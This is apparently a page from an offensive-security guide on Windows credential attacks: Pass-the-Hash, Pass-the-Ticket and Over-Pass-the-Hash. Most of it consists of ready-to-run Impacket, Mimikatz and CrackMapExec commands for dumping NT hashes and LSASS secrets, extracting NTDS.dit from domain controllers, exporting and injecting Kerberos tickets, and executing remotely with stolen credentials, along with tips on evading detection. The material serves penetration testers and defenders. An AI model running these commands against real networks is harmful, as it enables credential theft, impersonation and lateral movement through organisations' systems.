This guide is currently under development, and I greatly welcome any suggestions or feedback at reaper.gitbook@gmail.com

Pass-the-?

Pass-the-Hash (PtH) Attacks

NTLM Hash Overview

Service Purpose: The NT hash (MD4 of the UTF-16LE password, no salt; loosely called the "NTLM hash") is the stored credential Windows uses for NTLM challenge-response authentication, covering local logon and SMB, WMI and RPC sessions negotiated over NTLM.

Why Target NTLM Hashes: NTLM proves knowledge of the hash, never of the password, so a stolen hash can be used directly without cracking it, enabling immediate lateral movement.

Pass-the-Hash Attack

Purpose: Use extracted NT hashes to authenticate to other systems without knowing the plaintext password.

Requirements: The NT hash of the account, a target that still accepts NTLM authentication, and enough rights on that target for what you want to do (remote execution with psexec/wmiexec needs local admin). Caveat: local (non-domain) accounts other than the built-in RID 500 Administrator are blocked from remote admin by UAC token filtering unless LocalAccountTokenFilterPolicy is set to 1 on the target.

Attack Value: Immediate access to systems; works regardless of password strength, because the hash itself is the credential

NTLM Hash Extraction

Using Impacket Tools

# Remote dump over SMB/RPC: SAM, LSA secrets, cached domain logons and, on a DC, NTDS.dit (needs local admin on the target)
python3 secretsdump.py <domain>/<username>:<password>@<target-IP>

# Offline parse of registry hives copied off the box (-sam/-security/-system take files and need the LOCAL target keyword, they are not remote switches)
python3 secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL

# Cached domain credentials are included in the remote dump by default (there is no -cached switch); they are DCC2 hashes and must be cracked, they cannot be passed
# On a domain controller, limit the dump to the NT hashes from NTDS.dit
python3 secretsdump.py <domain>/<username>:<password>@<DC-IP> -just-dc-ntlm

Using Mimikatz (Windows)

# Extract from LSASS memory (needs SeDebugPrivilege, i.e. an elevated shell)
mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit"

# Extract from the SAM database (needs SYSTEM; token::elevate impersonates it)
mimikatz "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# Extract cached domain credentials (DCC2: crack-only, cannot be passed)
mimikatz "privilege::debug" "token::elevate" "lsadump::cache" "exit"

Using CrackMapExec

# Dump local SAM hashes from every host in the range where the credentials are local admin
# (CrackMapExec is now maintained as NetExec; nxc takes the same syntax)
crackmapexec smb <network-range> -u '<username>' -p '<password>' --sam

# Dump NTDS.dit from a domain controller (needs Domain Admin or equivalent replication rights)
crackmapexec smb <DC-IP> -u '<username>' -p '<password>' --ntds

Pass-the-Hash Execution

Using Impacket Tools

# SMB authentication with hash. The format is LMHASH:NTHASH; a leading colon passes only the NT hash, which is all modern targets check
# For a local account omit <domain>/ or use the target hostname in its place
python3 smbclient.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

# Remote command execution (all three need local admin on the target)
python3 psexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>     # uploads a service binary to ADMIN$, noisy
python3 wmiexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>    # no service, but command output is written to ADMIN$
python3 dcomexec.py -hashes :<NTLM-hash> <domain>/<username>@<target-IP>

Using CrackMapExec

# Pass-the-hash across a network range to find where the hash is accepted (Pwn3d! marks local admin)
# Add --local-auth when <username> is a local account rather than a domain account
crackmapexec smb <network-range> -u '<username>' -H <NTLM-hash>

# Execute commands via PtH
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> -x "whoami"

# Dump additional credentials from the new foothold
crackmapexec smb <target-IP> -u '<username>' -H <NTLM-hash> --sam --lsa

Pass-the-Ticket (PtT) Attacks

Kerberos Ticket Overview

Service Purpose: Kerberos tickets (a TGT issued by the KDC, and the service tickets obtained with it) are the session credentials in Active Directory, providing single sign-on without the password being sent again.

Why Target Kerberos Tickets: A ticket held in LSASS memory (or in a ccache file on Linux) can be copied to another host and replayed for as long as it is valid, impersonating the user without a password or hash.

Pass-the-Ticket Attack

Purpose: Extract Kerberos tickets from one session and reuse them to authenticate as that user from another system.

Requirements: A valid TGT (or a service ticket for the specific service you need) with lifetime left (default TGT lifetime is 10 hours, renewable up to 7 days), and a target in the same or a trusting domain that you can address by hostname so the right SPN is requested

Attack Value: User impersonation without a password or hash, session hijacking, privilege escalation when a privileged user's ticket is in memory

Kerberos Ticket Extraction

Using Mimikatz (Windows)

# List the tickets of the current logon session (no special privilege needed)
mimikatz "kerberos::list" "exit"

# Export the current session's tickets to .kirbi files
mimikatz "kerberos::list /export" "exit"

# Export the tickets of every logon session on the host, other users' included (needs SeDebugPrivilege)
mimikatz "privilege::debug" "sekurlsa::tickets /export" "exit"

# kerberos::list has no per-user filter: to target a specific user, run sekurlsa::tickets /export and
# pick the .kirbi files whose name contains that user; the one for krbtgt is the TGT

Using Impacket Tools

# getTGT.py does not extract anything: it requests a fresh TGT from the KDC with a password (or a hash/AES key, see Over-Pass-the-Hash below) and writes <username>.ccache
python3 getTGT.py <domain>/<username>:<password> -dc-ip <DC-IP>

# On a compromised Linux host, tickets already exist as ccache files (/tmp/krb5cc_<uid> or whatever KRB5CCNAME points to) and in keytabs; copy those
# Tickets exported from Windows (.kirbi) must be converted before impacket can use them
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>

Pass-the-Ticket Execution

Cross-Platform Ticket Conversion

# Convert Mimikatz tickets (.kirbi) to Unix format (.ccache)
python3 ticketConverter.py <ticket.kirbi> <ticket.ccache>

# Convert ccache to kirbi
python3 ticketConverter.py <ticket.ccache> <ticket.kirbi>

Using Impacket Tools

# Point the Kerberos library at the ticket cache
export KRB5CCNAME=<ticket.ccache>

# Use the ticket for authentication (-k: use the cache, -no-pass: do not prompt)
# <username> must match the ticket's client principal, and the target must be given by hostname/FQDN, not IP,
# because the service ticket is requested for cifs/<hostname>; add -dc-ip <DC-IP> if the KDC does not resolve via DNS
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass
python3 smbclient.py <domain>/<username>@<target-server> -k -no-pass
python3 wmiexec.py <domain>/<username>@<target-server> -k -no-pass

Using Mimikatz (Windows)

# Inject the ticket into the current logon session
mimikatz "kerberos::ptt <ticket.kirbi>" "exit"

# Verify the ticket is loaded, then use it (address the target by hostname so Kerberos, not NTLM, is negotiated)
klist
dir \\<target-server>\c$
psexec \\<target-server> cmd

Over-Pass-the-Hash (Pass-the-Key)

Hybrid Authentication Overview

Service Purpose: Over-pass-the-hash uses an NT hash (or AES key) as the Kerberos long-term key. The NT hash is the RC4-HMAC key the KDC derives from the same password, so it can encrypt the pre-authentication timestamp of an AS-REQ and obtain a genuine TGT.

Why Use Over-Pass-the-Hash: It turns an NTLM-only credential into Kerberos, which works where NTLM is disabled or restricted and blends in with normal domain traffic. Caveat: requesting with the NT hash forces RC4 (encryption type 0x17); in a domain where accounts normally use AES that downgrade is visible in 4768 events, so use the AES256 key when you have it.

Over-Pass-the-Hash Attack

Purpose: Use an NT hash or AES key to request a Kerberos TGT, then use that TGT exactly as in pass-the-ticket.

Requirements: NT hash or AES key of the account, and network access to a domain controller on 88/tcp for the AS-REQ; for members of Protected Users (RC4 is refused) the AES key is mandatory

Attack Value: Kerberos-based access that bypasses NTLM restrictions, and a TGT from which further Kerberos attacks can be run

Over-Pass-the-Hash Execution

Using Impacket Tools

# Request a TGT using the NT hash (RC4 etype); writes <username>.ccache in the current directory
python3 getTGT.py <domain>/<username> -hashes :<NTLM-hash> -dc-ip <DC-IP>

# Request a TGT using the AES256 key (etype 18, matching what real clients send)
python3 getTGT.py <domain>/<username> -aesKey <AES-key> -dc-ip <DC-IP>

# Use the obtained TGT (target by hostname, see Pass-the-Ticket above)
export KRB5CCNAME=<username>.ccache
python3 psexec.py <domain>/<username>@<target-server> -k -no-pass

Using Mimikatz (Windows)

# Over-pass-the-hash with NTLM: spawns a cmd whose outbound network logons use the hash (needs SeDebugPrivilege)
mimikatz "privilege::debug" "sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<NTLM-hash> /run:cmd" "exit"

# Over-pass-the-hash with AES256
mimikatz "privilege::debug" "sekurlsa::pth /user:<username> /domain:<domain> /aes256:<AES-key> /run:cmd" "exit"

# In the new cmd window: this is a netonly logon, so whoami still shows your original user;
# the injected credentials apply to outbound connections only, and the TGT is requested on the first Kerberos authentication
dir \\<target-server>\c$
klist  # now lists the TGT for <username>
